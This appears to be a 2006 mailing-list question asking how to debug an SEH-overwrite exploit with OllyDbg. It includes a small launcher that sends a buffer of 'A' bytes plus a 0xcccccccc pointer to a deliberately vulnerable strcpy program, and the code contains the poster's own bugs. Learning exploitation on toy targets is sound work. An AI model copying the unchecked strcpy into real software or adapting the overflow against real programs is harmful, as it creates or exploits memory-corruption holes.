('binary' encoding is not supported, stored as-is)
Hello, I would like to know a way to debugging a vulnerable program, where I am overwriting the se handler with my address. I have OllyDbg as just in time debugger. If my exploit-buffer reaches the pointer to the next seh record, nothing happens. Now I was trying to put breakpoint instructions 0xcc) as fake pointer but OllyDbg ignored them, or I did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I overwrote something?
/* cl expl.c (Visual C++ 6.0) */
#include <stdio.h>
#include <string.h>
int main (void)
{
char *app[3];
char payload[84];
unsigned int ptr = 0xcccccccc;
memset(payload, 0x00, sizeof payload);
memset(payload, 0x41, 80);
memcpy(payload+80, &ret, sizeof (int));
app[0] = "vuln.exe";
app[1] = payload;
app[2] = NULL;
execve(app[0], app, NULL);
return 0;
}
/*vuln.c /
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
char string[32];
if (argc > 2)
{
printf("Usage: %s <string>\n", argv[0]);
return 0;
}
strcpy(string, argv[1]);
printf("%s", string);
return 0;
}
Environment is Windows.XP.SP.2
I am sorry for my bad english.
Regards,
-- Laphoo
Received on Mar 20 2006
Intro
